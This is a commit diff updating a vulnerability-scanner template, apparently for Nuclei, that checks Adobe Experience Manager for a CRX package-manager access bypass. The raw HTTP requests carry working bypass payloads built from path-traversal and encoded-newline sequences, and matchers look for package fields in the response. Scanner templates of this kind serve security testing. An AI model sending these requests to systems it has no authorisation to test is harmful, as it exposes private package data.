Update aem-crx-bypass.yaml

patch-1
Dhiyaneshwaran 2021-07-01 22:23:08 +05:30 committed by GitHub
parent a3b9002c52
commit 39eb91a582
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 13 additions and 6 deletions

View File

@ -10,21 +10,28 @@ info:
requests:
- raw:
- |
GET /content/..;/crx/packmgr/list.jsp;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a.css?_dc=1615863080856&_charset_=utf-8&includeVersions=true HTTP/1.1
GET /crx/packmgr/list.jsp;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0aa.css?_dc=1615863080856&_charset_=utf-8&includeVersions=true HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
User-Agent: curl/123
Referer: {{BaseURL}}
Connection: close
Accept-Encoding: gzip, deflate
- |
GET /content/..;/crx/packmgr/list.jsp;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0aa.css?_dc=1615863080856&_charset_=utf-8&includeVersions=true HTTP/1.1
Host: {{Hostname}}
User-Agent: curl/123
Referer: {{BaseURL}}
Connection: close
Accept-Encoding: gzip, deflate
matchers-condition: and
matchers:
- type: word
part: body
word:
- '"results:"'
- '"path:"'
- '"pid":'
- 'buildCount'
- 'downloadName'
- 'acHandling'
condition: and
- type: word